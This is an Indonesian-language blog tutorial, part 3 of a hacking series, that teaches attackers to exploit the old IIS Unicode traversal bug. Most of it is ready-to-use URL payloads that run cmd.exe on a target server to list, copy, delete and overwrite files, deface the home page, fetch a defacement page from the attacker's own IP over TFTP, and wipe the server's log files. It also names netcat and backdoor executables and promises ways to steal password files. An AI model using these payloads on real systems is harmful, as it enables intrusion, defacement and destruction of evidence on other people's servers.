Belajar Hacker A-Z Part 3 (Mamfaatkan IIS Bugs)

CARA MEMANFAATKAN IIS BUGS LEBIH DARI SATU CARA:
Irhaby007

(Lanjutan dari Part 2)
Bugs-bugs IIS bisa langsung kita praktekkan melalui explorer dengan memanfaatkan file cmd.exe agar semua perintah (command) yang kita minta terlaksana.

CONTOH BUGS INI DAN APLIKASI COMMAND:
http://www.xxx.com/_vti_bin/..%c0%af../..%c0%af../winnt/system32/cmd.exe?/c+dir+c:

COMMAND UNTUK MEMBUAT PENUNJUK BARU:
http://www.xxx.com/_vti_bin/..%c0%af../..%c0%af../winnt/system32/cmd.exe?/c+md+cJ

COMMAND UNTUK MEN-DELETE PETUNJUK:
http://www.xxx.com/_vti_bin/..%c0%af../..%c0%af../winnt/system32/cmd.exe?/c+rd+cJ

COMMAND UNTUK MENG-COPY:
http://www.xxx.com/_vti_bin/..%c0%af../..%c0%af../winnt/system32/cmd.exe?/c+copy+c:winntsystem32cmd.exe+c:inetpubscriptsDJ.exe

COMMAND UNTUK MENGHAPUS:
http://www.xxx.com/_vti_bin/..%c0%af../..%c0%af../winnt/system32/cmd.exe?/c+md+c:inetpubwwwrootindex.asp

COMMAND UNTUK ME-RENAME FILE:
http://www.xxx.com/_vti_bin/..%c0%af../..%c0%af../winnt/system32/cmd.exe?/c+ren+cJ.htm+DJKING.htm
COMMAND UNTUK MELIHAT ISI FILE:
http://www.xxx.com/_vti_bin/..%c0%af../..%c0%af../winnt/system32/cmd.exe?/c+type+c:index.htm

COMMAND UNTUK MENULISKAN SESUATU DALAM FILE APA SAJA:
http://www.xxx.com/_vti_bin/..%c0%af../..%c0%af../winnt/system32/cmd.exe?/c+echo+HACKED+BY+DJ+KING+>+cJ.txt

INGAT: Kadang kita perlu merubah nama petunjuk (exentition) menjadi: msadc, scripts, _vit_admin, iisadmpwd, _vti_bin, cgi-bin, .samples.

SEKARANG, UNTUK MERUBAH TAMPILAN AWAL (HOME) SEBUAH SITUS, MAKA HARUS:

• Menuliskan sesuatu pada Home dengan menggunakan perintah echo
• Meng-apload tampilan buatan Antum melalui program TFTP
• Menuliskan sesuatu pada file Home sebuah situs (file: index.html) adalah menggunakan command echo.

Sebagai dasar, Antum harus terlebih dahulu meng-copy file cmd.exe ke folder scripts, caranya seperti ini –sekedar contoh saja:
http://www.xxx.com/_vti_bin/..%c0%af../..%c0%af../winnt/system32/cmd.exe?/c+copy+c:winntsystem32cmd.exe+c:inetpubscriptsDJ.exe

Nah, setelah meng-copy file ini, selanjutnya bisa dilakukan pemeriksaan terhadap bugs lain yang ada di situs tersebut, caranya:
http://www.xxx.com/scripts/DJ.exe/c+dir+c:

Setelah itu, command echo baru bisa dijalankan, caranya adalah:
http://www.xxx.com/scripts/DJ.exe?/…hackermail.com+>+c:inetpubwwwrootindex.htm

CATATAN PENTING:
File indeks utama sebuah situs tidak selalunya bernama index.htm, bisa saja namanya: default.html, index.html, default.asp, default.htm. Jadi, pastikan dulu nama file indeksnya.
Tapi, biasanya index.htm lah yang sering dipakai. Ada kemungkinan juga bahwa file indeks berada di selain folder wwwroot, jadi harus dicari.

6 CARA MENG-UPLOAD TAMPILAN UTAMA (BIKINAN KITA, PENERJ.) DENGAN PROGRAM TFTP:

Ingat ya… program TFTP ini bisa Antum temukan dengan meng-klik link yang sudah kami sebutkan di atas, berkat anugerah Allah.

Aplikasi bugs nya juga bisa dilakukan dengan cara yang sudah kita jelaskan di atas. Sekarang, silahkan mendownload program FTP, program ini kecil ukurannya dan gratis. Letakkan program ini pada directory c:

Taruh file index (bikinan Antum) atau lebih tepatnya tampilan utama buatan Antum yang akan Antum upload, pada directory c: juga.

Sudah… sekarang jalankan program TFTP nya, kalau sudah siap maka masukkan perintah berikut ini:

http://www.xxx.com/_vti_bin/..%c0%af../..%c0%af../winnt/system32/cmd.exe?/c+tftp.exe+”-i”+y.y.y.y+GET+index.htm+C:inetpubwwwrootindex.htm

Perintah tftp.exe di atas, maksudnya adalah program FTP yang digunakan untuk meng-upload.

Sedangkan “i-” adalah parameternya.

Dan y.y.y.y adalah IP address Antum.

Untuk perintah lainnya, menurut saya tidak terlalu penting untuk saya jelaskan.

Untuk C:inetpubwwwrootindex.htm, maksudnya adalah posisi directory yang dituju seperti telah saya sebutkan. Tetapi, antara satu situs dengan situs lain tidak selalu sama letaknya, maka dari itu harus benar-benar dipastikan dulu letak directory tersebut sebelumnya.

Terakhir, untuk menghapus log caranya adalah:

http://www.xxx.com/_vti_bin/..%c0%af../..%c0%af../winnt/system32/cmd.exe?/c+del+c:/winnt/system32/logfiles/*.log

Begitulah kira-kira cara memperlakukan server-server situs yang ada di windows dan IIS. Adapun situs-situs yang menggunakan server Apache on Linux misalnya, maka cara logikanya sama sekali berbeda, yang sama hanya pada penyerangan melalui ftp server. Sebab, kebanyakan copy-an program ftp itu memiliki banyak bugs dan bisa dimanfaatkan.

1. Penjelasan Tentang Bugs Pada Unicode Dan Cara Memanfaatkannya:
Pertama, bugs-bugs pada Unicode:
UNICODE – Internet Information Service IIS4 – IIS5
Unicode adalah: Sistem operasi untuk menjalankan data-data pada Internet. Ada yang versi 4.0 ada yang 5.0

Jadi pengertian Unicode adalah sekumpulan bugs yang ada dalam sekumpulan operator file, yang biasanya digabungkan dengan IIS 4.0 atau IIS 5.0, yang mana biasanya juga dibarengi dengan NT4 atau Win2k.

CARA MENEMUKAN BUGS-BUGS INI:

Untuk menemukan bugs-bugs ini, bisa dengan memakai dua cara:

Pertama, memakai program yang sesuai dan khusus yang berfungsi untuk menemukan bugs-bugs ini. Baik dengan program yang bekerja untuk sistem operasi Windows, maupun dengan Shell yang bekerja untuk sistem operasi Linux.

Kedua, dengan mengaplikasikan bugs langsung pada situs.

BAGAIMANA CARA MEMANFAATKAN BUGS PADA UNICODE?

Pada penerapan bugs yang ada dalam IIS 4.0 mau pun IIS 5.0, file CMD akan memulai dengan memecahkan kode pada Unicode ketika contoh yang diberikan keliru. Nah ketika inilah, bugs itu bisa dimanfaatkan.

PERINTAH-PERINTAH DALAM FILE CMD:

Perintah di sini berfungsi untuk membuat penunjuk baru, atau me-remove penunjuk, copy-paste, menghapus dan merubah nama file, melihat isi file, menulis di dalam file apa saja, dan perintah untuk menarik file apa saja. Contohnya adalah sebagai berikut:

Pertama dengan menjalankan file ssinc.dll, caranya:

Buat page dengan nama test.shtml, letakkan page ini dalam folder wwwroot/hEx/test.shtml
Penulisan Kode ini ada dalam layar explorer, di mana huruf A bisa ditulis lebih dari 2049 kali. Sekarang, kita meminta tampilan itu ditayangkan di layar, setelah menuliskan: http://www.xxx.com/test.shtml

Setelah itu, akan segera muncul tampilan di hadapan Antum. Sekarang Antum bisa menuliskannya, sehingga terbentuklah masalah berupa Acces denied. Jika perintah error itu nomornya 500, maknanya adalah Antum belum melakukan langkah yang benar, dan Antum harus mengulanginya.

Cara kedua, dengan menggunakan program NC.exe. Pada kondisi ini, file di upload di dalam folder Temp pada penunjuk Windows.

Nah, perintah-perintahnya bisa dijalankan melalui DOS. Dan asal tahu, folder Temp bisa diupload.

Cara ketiga, dengan menggunakan aksi cracking terhadap server menggunakan program yang sesuai dengan tujuan ini. Tetapi, cara seperti ini sering sekali tidak terlalu bermanfaat.

Cara keempat, mencari file root.exe, sensepost.exe, shell.exe, w3svc.exe lalu meng-copy nya ke folder c:\inetpub\scripts, setelah itu memanfaatkan bugs melalui jalan ini.

Sampai di sini kami telah memberikan penjelasan sekaligus contoh, tentang bagaimana menyerang situs melalui bugs-bugs yang ada di dalamnya.

Tetapi ada yang lebih penting lagi, bahwa ada bugs-bugs yang bisa menghantarkan kita untuk memperoleh file password dari sistem operasi. Jika kita berhasil mendapatkan file ini dan memecahkan kodenya, seluruh sistem operasi akan “tunduk” kepada kita, dan semua situs yang ada di bawah server tersebut bisa kita arahkan sesuka kita. Nah, inilah yang akan kita jelaskan pada bagian berikut ini dengan bantuan Allah.

Bersambung ke part berikutnya!

Tinggalkan Balasan

Isikan data di bawah atau klik salah satu ikon untuk log in:

Logo WordPress.com

You are commenting using your WordPress.com account. Logout / Ubah )

Gambar Twitter

You are commenting using your Twitter account. Logout / Ubah )

Foto Facebook

You are commenting using your Facebook account. Logout / Ubah )

Foto Google+

You are commenting using your Google+ account. Logout / Ubah )

Connecting to %s

%d blogger menyukai ini: